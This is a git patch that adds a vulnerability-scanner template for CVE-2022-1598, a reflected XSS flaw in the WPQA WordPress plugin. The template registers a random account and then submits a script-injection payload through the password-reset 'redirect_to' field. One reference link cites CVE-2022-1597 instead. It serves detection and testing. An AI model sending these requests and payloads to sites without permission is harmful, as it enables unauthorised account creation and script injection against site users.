From 23321e1cda6d0e032ea8675595b72867db6576c0 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <dwi.siswanto98@gmail.com>
Date: Tue, 17 May 2022 15:26:45 +0700
Subject: [PATCH] Add CVE-2022-1598

---
 cves/2022/CVE-2022-1598.yaml | 56 ++++++++++++++++++++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 cves/2022/CVE-2022-1598.yaml

diff --git a/cves/2022/CVE-2022-1598.yaml b/cves/2022/CVE-2022-1598.yaml
new file mode 100644
index 0000000000..10c5f42bb5
--- /dev/null
+++ b/cves/2022/CVE-2022-1598.yaml
@@ -0,0 +1,56 @@
+id: CVE-2022-1598
+
+info:
+  name: WPQA < 5.4 - Reflected Cross-Site Scripting
+  author: veshraj
+  severity: medium
+  description: |
+    The plugin, used as a companion for the Discy and Himer themes,
+    does not sanitise and escape a parameter on its reset password
+    form which makes it possible to perform reflected XSS.
+  reference:
+    - https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597
+  tags: xss,wordpress,wp-plugin,wp,cve,cve2022
+
+variables:
+  user: "{{to_lower(rand_base(5))}}"
+  pass: "{{user}}{{to_lower(rand_base(3))}}"
+
+requests:
+  - raw:
+    - |
+      POST /wp-admin/admin-ajax.php HTTP/1.1
+      Host: {{Hostname}}
+      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
+      Content-Type: application/x-www-form-urlencoded
+
+      user_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&form_type=wpqa-signup&action=wpqa_ajax_signup_process
+
+    - |
+      POST /wp-admin/admin-ajax.php HTTP/1.1
+      Host: {{Hostname}}
+      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
+      Content-Type: application/x-www-form-urlencoded
+
+      user_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}
+
+    payloads:
+      redirect_to:
+        - '"><img src=x onerror=alert(document.domain)>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{redirect_to}}"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file